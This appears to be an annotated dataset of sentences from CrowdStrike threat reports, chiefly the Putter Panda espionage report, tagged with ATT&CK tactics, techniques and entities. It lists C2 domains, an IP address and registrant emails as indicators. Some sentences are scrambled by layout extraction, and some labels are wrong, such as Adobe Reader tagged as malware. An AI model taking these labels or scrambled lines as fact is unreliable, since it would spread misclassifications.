applications to tangibly reduce risk Technical Risk Assessment | Highlights security vulnerabilities, weaknesses, and gaps in the IT environment across endpoint devices, applications, and user identities Identity Security Assessment | Audits identity security practices and defense posture for weaknesses, including Active Directory domain configuration, account configuration, privilege delegation, and potential attack paths Cloud Security Assessment | Identifies misconfigurations and vulnerabilities in the cloud estate that could be exploited by adversaries Compromise Assessment | Exposes and addresses undetected threat activity through a one-time threat hunt available for endpoint, cloud, and SaaS applications TRAINING AND SECURITY UPSKILLING Builds security acumen and closes the skills gap through CrowdStrike University, offering on-demand training, personalized learning paths, and five certifications for deep Falcon module expertise", "sentence_text": "AboutAbout\nmodern security with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk — endpoints and cloud workloads, identity and data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p53-s447-6b906f", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 53, "sentence_id": 447, "context_before": "AboutAbout\nmodern security with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk — endpoints and cloud workloads, identity and data.", "sentence_text": "Learn more: www.crowdstrike.com Follow us: Blog | X | LinkedIn", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p53-s448-3dac5f", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 53, "sentence_id": 448, "context_before": "Learn more: www.crowdstrike.com Follow us: Blog | X | LinkedIn", "sentence_text": "| YouTube Start a free trial today: www.crowdstrike.com/free-trial-guide", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p1-s1-b8c1c2", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Putter PandaCrowdStrike\nIntelligence\nReport\nThis report is part of the series of technical and strategic reporting available to CrowdStrike Intelligence subscribers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p1-s2-ea7a09", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 1, "sentence_id": 2, "context_before": "Putter PandaCrowdStrike\nIntelligence\nReport\nThis report is part of the series of technical and strategic reporting available to CrowdStrike Intelligence subscribers.", "sentence_text": "It is being released publicly to expose a previously undisclosed PLA unit involved in cyberespionage against Western technology companies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p2-s3-19a2e8", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 2, "sentence_id": 3, "context_before": "It is being released publicly to expose a previously undisclosed PLA unit involved in cyberespionage against Western technology companies.", "sentence_text": "In May 2014, the U.S. Department of Justice charged five Chinese nationals for economic espionage against U.S.\ncorporations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p2-s4-3f8754", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 2, "sentence_id": 4, "context_before": "In May 2014, the U.S. Department of Justice charged five Chinese nationals for economic espionage against U.S.\ncorporations.", "sentence_text": "The five known state actors are officers in Unit 61398 of the Chinese People’s Liberation Army (PLA).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p2-s5-c1565a", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 2, "sentence_id": 5, "context_before": "The five known state actors are officers in Unit 61398 of the Chinese People’s Liberation Army (PLA).", "sentence_text": "In response, the Chinese government stated that the claims were “absurd” and based on “fabricated facts”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p2-s6-ed8ecf", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 2, "sentence_id": 6, "context_before": "In response, the Chinese government stated that the claims were “absurd” and based on “fabricated facts”.", "sentence_text": "Not only did the U.S. Government offer in its criminal indictment the foundation of evidence designed to prove China’s culpability in electronic espionage, but also illustrated that the charges are only the tip of a very large iceberg.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p2-s7-4b2552", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 2, "sentence_id": 7, "context_before": "Not only did the U.S. Government offer in its criminal indictment the foundation of evidence designed to prove China’s culpability in electronic espionage, but also illustrated that the charges are only the tip of a very large iceberg.", "sentence_text": "Those reading the indictment should not conclude that the People’s Republic of China (PRC) hacking campaign is limited to five soldiers in one military unit, or that they solely target the United States government and corporations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p2-s8-72cb37", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 2, "sentence_id": 8, "context_before": "Those reading the indictment should not conclude that the People’s Republic of China (PRC) hacking campaign is limited to five soldiers in one military unit, or that they solely target the United States government and corporations.", "sentence_text": "Rather, China’s decade-long economic espionage campaign is massive and unrelenting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p2-s9-a5225e", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 2, "sentence_id": 9, "context_before": "Rather, China’s decade-long economic espionage campaign is massive and unrelenting.", "sentence_text": "Through widespread espionage campaigns, Chinese threat actors are targeting companies and governments in every part of the globe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p2-s10-bd8556", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 2, "sentence_id": 10, "context_before": "Through widespread espionage campaigns, Chinese threat actors are targeting companies and governments in every part of the globe.", "sentence_text": "At CrowdStrike, we see evidence of this activity first-hand as our services team conducts Incident Response investigations and responds to security breaches at some of the largest organizations around the world.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p2-s11-6936b1", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 2, "sentence_id": 11, "context_before": "At CrowdStrike, we see evidence of this activity first-hand as our services team conducts Incident Response investigations and responds to security breaches at some of the largest organizations around the world.", "sentence_text": "We have first-hand insight into the billions of dollars of intellectual property systematically leaving many of the largest corporations - often times unbeknownst to their executives and boards of directors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p2-s12-0ddf87", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 2, "sentence_id": 12, "context_before": "We have first-hand insight into the billions of dollars of intellectual property systematically leaving many of the largest corporations - often times unbeknownst to their executives and boards of directors.", "sentence_text": "The campaign that is the subject of this report further points to espionage activity outside of Unit 61398, and reveals the activities of Unit 61486.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p2-s13-2d31e9", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 2, "sentence_id": 13, "context_before": "The campaign that is the subject of this report further points to espionage activity outside of Unit 61398, and reveals the activities of Unit 61486.", "sentence_text": "Unit 61486 is the 12th Bureau of the PLA’s 3rd General Staff Department (GSD) and is headquartered in Shanghai, China.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p2-s14-7943b1", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 2, "sentence_id": 14, "context_before": "Unit 61486 is the 12th Bureau of the PLA’s 3rd General Staff Department (GSD) and is headquartered in Shanghai, China.", "sentence_text": "With revenues totaling $189.2 billion in 2013, the satellite industry is a prime target for espionage campaigns that result in the theft of high-stakes intellectual property.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p2-s15-07502f", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 2, "sentence_id": 15, "context_before": "With revenues totaling $189.2 billion in 2013, the satellite industry is a prime target for espionage campaigns that result in the theft of high-stakes intellectual property.", "sentence_text": "Our Global Intelligence Team actively tracks and reports on more than 70 espionage groups, approximately half of which operate out of China and are believed to be tied to the Chinese government.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p2-s16-d6bc70", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 2, "sentence_id": 16, "context_before": "Our Global Intelligence Team actively tracks and reports on more than 70 espionage groups, approximately half of which operate out of China and are believed to be tied to the Chinese government.", "sentence_text": "This report is part of our extensive intelligence library and was made available to our intelligence subscribers in April 2014, prior to the US Government’s criminal indictment and China’s subsequent refusal to engage in a constructive dialog.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p2-s17-548513", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 2, "sentence_id": 17, "context_before": "This report is part of our extensive intelligence library and was made available to our intelligence subscribers in April 2014, prior to the US Government’s criminal indictment and China’s subsequent refusal to engage in a constructive dialog.", "sentence_text": "We believe the U.S. Government indictments and global acknowledgment and awareness are important steps in the right direction.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p2-s18-484cb4", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 2, "sentence_id": 18, "context_before": "We believe the U.S. Government indictments and global acknowledgment and awareness are important steps in the right direction.", "sentence_text": "In support of these efforts, we are making this report available to the public to continue the dialog around this ever-present threat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p2-s19-410c9b", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 2, "sentence_id": 19, "context_before": "In support of these efforts, we are making this report available to the public to continue the dialog around this ever-present threat.", "sentence_text": "George Kurtz\nPresident/CEO & Co-Founder, CrowdStrike", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p5-s30-77532c", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 5, "sentence_id": 30, "context_before": "Executive Summary", "sentence_text": "The attribution provided in this report points to Chen Ping, aka cpyy (born on May 29, 1979), as an individual responsible for the domain registration for the Command and Control (C2) of PUTTER PANDA malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p5-s31-50ee1c", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 5, "sentence_id": 31, "context_before": "The attribution provided in this report points to Chen Ping, aka cpyy (born on May 29, 1979), as an individual responsible for the domain registration for the Command and Control (C2) of PUTTER PANDA malware.", "sentence_text": "In addition to cpyy, the report identifies the primary location of Unit 61486.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p5-s32-a82628", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 5, "sentence_id": 32, "context_before": "In addition to cpyy, the report identifies the primary location of Unit 61486.", "sentence_text": "The PLA’s GSD Third Department is generally acknowledged to be China’s premier Signals Intelligence (SIGINT)\ncollection and analysis agency, and the 12th Bureau Unit 61486, headquartered in Shanghai, supports China’s space surveillance network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p5-s33-c9c807", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 5, "sentence_id": 33, "context_before": "The PLA’s GSD Third Department is generally acknowledged to be China’s premier Signals Intelligence (SIGINT)\ncollection and analysis agency, and the 12th Bureau Unit 61486, headquartered in Shanghai, supports China’s space surveillance network.", "sentence_text": "Domains registered by Chen Ping were used to control PUTTER PANDA malware.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Use domains registered by Chen Ping to control PUTTER PANDA malware.", "entities": [ { "text": "PUTTER PANDA", "start": 53, "end": 65, "label": "ThreatActor" }, { "text": "Domains registered by Chen Ping were used to control PUTTER PANDA malware", "start": 0, "end": 73, "label": "Action" }, { "text": "Domains registered by Chen Ping", "start": 0, "end": 31, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p5-s34-678bbc", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 5, "sentence_id": 34, "context_before": "Domains registered by Chen Ping were used to control PUTTER PANDA malware.", "sentence_text": "These domains were registered to an address corresponding to the physical location of the Shanghai headquarters of 12th Bureau, specifically Unit 61486.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p5-s35-f56770", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 5, "sentence_id": 35, "context_before": "These domains were registered to an address corresponding to the physical location of the Shanghai headquarters of 12th Bureau, specifically Unit 61486.", "sentence_text": "The report illuminates a wide set of tools in use by the actors, including several Remote Access Tools (RATs).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p5-s36-1af776", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 5, "sentence_id": 36, "context_before": "The report illuminates a wide set of tools in use by the actors, including several Remote Access Tools (RATs).", "sentence_text": "The RATs are used by the PUTTER PANDA actors to conduct intelligence-gathering operations with a significant focus on the space technology sector.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0009", "name": "Collection" } ], "techniques": null, "procedure": "Use RATs to conduct intelligence-gathering operations focused on the space technology sector.", "entities": [ { "text": "RATs", "start": 4, "end": 8, "label": "MalwareTool" }, { "text": "PUTTER PANDA", "start": 25, "end": 37, "label": "ThreatActor" }, { "text": "are used by the PUTTER PANDA actors to conduct intelligence-gathering operations", "start": 9, "end": 89, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p5-s37-fbe4c8", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 5, "sentence_id": 37, "context_before": "The RATs are used by the PUTTER PANDA actors to conduct intelligence-gathering operations with a significant focus on the space technology sector.", "sentence_text": "This toolset provides a wide degree of control over a victim system and can provide the opportunity to deploy additional tools at will.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p5-s38-08db15", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 5, "sentence_id": 38, "context_before": "This toolset provides a wide degree of control over a victim system and can provide the opportunity to deploy additional tools at will.", "sentence_text": "They focus their exploits against popular productivity applications such as Adobe Reader and Microsoft Office to deploy custom malware through targeted email attacks.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1566.001", "name": "Phishing: Spearphishing Attachment" } ], "procedure": "Exploit Adobe Reader and Microsoft Office through targeted email attacks to deploy custom malware.", "entities": [ { "text": "focus their exploits against popular productivity applications such as Adobe Reader and Microsoft Office", "start": 5, "end": 109, "label": "Action" }, { "text": "Adobe Reader", "start": 76, "end": 88, "label": "MalwareTool" }, { "text": "Microsoft Office", "start": 93, "end": 109, "label": "MalwareTool" }, { "text": "deploy custom malware through targeted email attacks", "start": 113, "end": 165, "label": "Action" } ] }, { "uid": "crowdstrike-47_crowdstrike_report-p6-s39-b2a739", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 6, "sentence_id": 39, "context_before": "They focus their exploits against popular productivity applications such as Adobe Reader and Microsoft Office to deploy custom malware through targeted email attacks.", "sentence_text": "KEY FINDINGS\n➔ Putter Panda is a cyber espionage ➔", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p6-s40-4af923", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 6, "sentence_id": 40, "context_before": "KEY FINDINGS\n➔ Putter Panda is a cyber espionage ➔", "sentence_text": "12th Bureau Unit 61486.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p6-s41-0ad7f5", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 6, "sentence_id": 41, "context_before": "12th Bureau Unit 61486.", "sentence_text": "This unit is supports the space based signals ➔", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p6-s42-d92a5a", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 6, "sentence_id": 42, "context_before": "This unit is supports the space based signals ➔", "sentence_text": "They focus their exploits against intelligence (SIGINT) mission.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p6-s43-324296", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 6, "sentence_id": 43, "context_before": "They focus their exploits against intelligence (SIGINT) mission.", "sentence_text": "popular productivity applications such as Adobe Reader and Microsoft ➔", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p6-s44-a86a1c", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 6, "sentence_id": 44, "context_before": "popular productivity applications such as Adobe Reader and Microsoft ➔", "sentence_text": "The 12th Bureau Unit 61486, Office to deploy custom malware headquartered in Shanghai, is widely through targeted email attacks.\naccepted to be China’s primary SIGINT collection and analysis ➔ CrowdStrike identified Chen Ping, agency, supporting China’s space aka cpyy, a suspected member of surveillance network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p6-s45-27a918", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 6, "sentence_id": 45, "context_before": "The 12th Bureau Unit 61486, Office to deploy custom malware headquartered in Shanghai, is widely through targeted email attacks.\naccepted to be China’s primary SIGINT collection and analysis ➔ CrowdStrike identified Chen Ping, agency, supporting China’s space aka cpyy, a suspected member of surveillance network.", "sentence_text": "the PLA responsible for procurement of the domains associated with ➔", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p6-s46-3d4289", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 6, "sentence_id": 46, "context_before": "the PLA responsible for procurement of the domains associated with ➔", "sentence_text": "This is a determined adversary operations conducted by Putter group, conducting intelligence- Panda.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p8-s48-d309ce", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 8, "sentence_id": 48, "context_before": "Attribution", "sentence_text": "Attribution\nThere are several pieces of evidence to indicate that the activity tracked by CrowdStrike as PUTTER PANDA is attributable to a set of actors based in China, operating on behalf of the Chinese People’s Liberation Army (PLA).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p8-s49-c8f53d", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 8, "sentence_id": 49, "context_before": "Attribution\nThere are several pieces of evidence to indicate that the activity tracked by CrowdStrike as PUTTER PANDA is attributable to a set of actors based in China, operating on behalf of the Chinese People’s Liberation Army (PLA).", "sentence_text": "PUTTER PANDA has several connections to actors and infrastructure tied to COMMENT PANDA, a group previously attributed to Unit 61398 of the PLA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p9-s50-e40462", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 9, "sentence_id": 50, "context_before": "PUTTER PANDA has several connections to actors and infrastructure tied to COMMENT PANDA, a group previously attributed to Unit 61398 of the PLA.", "sentence_text": "C2 Indicators", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p9-s51-2cee96", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 9, "sentence_id": 51, "context_before": "C2 Indicators", "sentence_text": "Although some of the domains used for command and control of the tools described later in this report appear to be legitimate sites that have been compromised in some way, many of them appear to have been originally registered by the operators.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p9-s52-9810d2", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 9, "sentence_id": 52, "context_before": "Although some of the domains used for command and control of the tools described later in this report appear to be legitimate sites that have been compromised in some way, many of them appear to have been originally registered by the operators.", "sentence_text": "C2 Domains and Original Registrant", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p10-s53-78d6d2", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 10, "sentence_id": 53, "context_before": "C2 Domains and Original Registrant", "sentence_text": "C2 Indicators (cont’d)\nThe most significant finding is that an actor known as cpyy appears to have registered a significant number of C2 domains.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p10-s54-c6df1d", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 10, "sentence_id": 54, "context_before": "C2 Indicators (cont’d)\nThe most significant finding is that an actor known as cpyy appears to have registered a significant number of C2 domains.", "sentence_text": "This actor is discussed in the next section.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p10-s55-a97b9c", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 10, "sentence_id": 55, "context_before": "This actor is discussed in the next section.", "sentence_text": "Many of the domains have had their registrant information changed, likely in an attempt to obfuscate the identity of the operators.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p10-s56-65d05b", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 10, "sentence_id": 56, "context_before": "Many of the domains have had their registrant information changed, likely in an attempt to obfuscate the identity of the operators.", "sentence_text": "For instance, several domains originally registered by cpyy had their email address updated to van.dehaim@gmail.com around the end of 2009; for siseau.com the change occurred between July 2009 and November 2009, and for vssigma.com, the change occurred between August 2009 and December 2009.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p10-s57-7831d1", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 10, "sentence_id": 57, "context_before": "For instance, several domains originally registered by cpyy had their email address updated to van.dehaim@gmail.com around the end of 2009; for siseau.com the change occurred between July 2009 and November 2009, and for vssigma.com, the change occurred between August 2009 and December 2009.", "sentence_text": "Historical registrant information for anfoundation.us, rwchateau.com, and succourtion.org was not available prior to 2010, but it is likely that these domains were also originally registered to a personally attributable email account.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p10-s58-8b8610", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 10, "sentence_id": 58, "context_before": "Historical registrant information for anfoundation.us, rwchateau.com, and succourtion.org was not available prior to 2010, but it is likely that these domains were also originally registered to a personally attributable email account.", "sentence_text": "Similarly, several domains registered to mike.johnson_mj@yahoo.com have had their registrant email updated during March 2014 (see Table 2).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p10-s59-9c005a", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 10, "sentence_id": 59, "context_before": "Similarly, several domains registered to mike.johnson_mj@yahoo.com have had their registrant email updated during March 2014 (see Table 2).", "sentence_text": "These registrant changes may indicate an increased awareness of operational security (OPSEC) from the PUTTER PANDA actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p10-s60-2b3549", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 10, "sentence_id": 60, "context_before": "These registrant changes may indicate an increased awareness of operational security (OPSEC) from the PUTTER PANDA actors.", "sentence_text": "The recent changes to the domains shown in Table 2 may indicate that the Registrant Email operators are preparing new campaigns Addresses for that make use of this infrastructure, or they Domains Original- are attempting to disassociate all these ly Registered to mike.johnson_mj@ yahoo.com", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p10-s61-7ad0d3", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 10, "sentence_id": 61, "context_before": "The recent changes to the domains shown in Table 2 may indicate that the Registrant Email operators are preparing new campaigns Addresses for that make use of this infrastructure, or they Domains Original- are attempting to disassociate all these ly Registered to mike.johnson_mj@ yahoo.com", "sentence_text": "Although no attributable information was found on the email addresses associated with the domains described above (aside from cpyy and httpchen – see below), several other domains were found to have been registered by some of these addresses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p10-s62-5a0022", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 10, "sentence_id": 62, "context_before": "Although no attributable information was found on the email addresses associated with the domains described above (aside from cpyy and httpchen – see below), several other domains were found to have been registered by some of these addresses.", "sentence_text": "These are shown in Table 3, and may be used for command and control of PUTTER PANDA tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p10-s63-3023dd", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 10, "sentence_id": 63, "context_before": "These are shown in Table 3, and may be used for command and control of PUTTER PANDA tools.", "sentence_text": "domains from a single email address, perhaps due to OPSEC concerns or issues with the specific email account.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p11-s64-bdda60", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 11, "sentence_id": 64, "context_before": "domains from a single email address, perhaps due to OPSEC concerns or issues with the specific email account.", "sentence_text": "C2 Indicators\n(cont’d)\nTargeting\nThe subdomains associated with these domains via DNS records, along with some of the domain names themselves, point to some areas of interest for the PUTTER PANDA operators (see also Droppers in the following Technical Analysis section):\n• Space, satellite, and remote sensing technology (particularly within Europe);\n• Aerospace, especially European aerospace companies;\n• Japanese and European telecommunications.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p11-s65-8b51f2", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 11, "sentence_id": 65, "context_before": "C2 Indicators\n(cont’d)\nTargeting\nThe subdomains associated with these domains via DNS records, along with some of the domain names themselves, point to some areas of interest for the PUTTER PANDA operators (see also Droppers in the following Technical Analysis section):\n• Space, satellite, and remote sensing technology (particularly within Europe);\n• Aerospace, especially European aerospace companies;\n• Japanese and European telecommunications.", "sentence_text": "It is likely that PUTTER PANDA will continue to attack targets of this nature in future intelligence- gathering operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p11-s66-ae643e", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 11, "sentence_id": 66, "context_before": "It is likely that PUTTER PANDA will continue to attack targets of this nature in future intelligence- gathering operations.", "sentence_text": "Associated with\nRegistrant Emails\nFound in PUTTER PANDA C2 Domains", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p12-s67-c428ce", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 12, "sentence_id": 67, "context_before": "Associated with\nRegistrant Emails\nFound in PUTTER PANDA C2 Domains", "sentence_text": "C2 Indicators (cont’d) The decipherment.net domains resolved to this IP address from 11 October 2012 to at least 25 February 2013, and the botanict.com domain resolved from 11 Connections to Other October 2012 to 24 March 2013.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p12-s68-395efe", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 12, "sentence_id": 68, "context_before": "C2 Indicators (cont’d) The decipherment.net domains resolved to this IP address from 11 October 2012 to at least 25 February 2013, and the botanict.com domain resolved from 11 Connections to Other October 2012 to 24 March 2013.", "sentence_text": "Adversary Groups\nDuring part of this timeframe (30 June 2012 - 30 COMMENT PANDA October 2012), a domain associated with COMMENT Based on passive DNS records, PANDA resolved to this same IP address: login.\nseveral PUTTER PANDA associated aolon1ine.com.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p12-s69-fa2ffe", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 12, "sentence_id": 69, "context_before": "Adversary Groups\nDuring part of this timeframe (30 June 2012 - 30 COMMENT PANDA October 2012), a domain associated with COMMENT Based on passive DNS records, PANDA resolved to this same IP address: login.\nseveral PUTTER PANDA associated aolon1ine.com.", "sentence_text": "Additionally, for a brief period in April domains have resolved to IP 2012, update8.firefoxupdata.com also resolved to address 100.42.216.230:\nthis IP address.", "relevant": "no", "tactic": 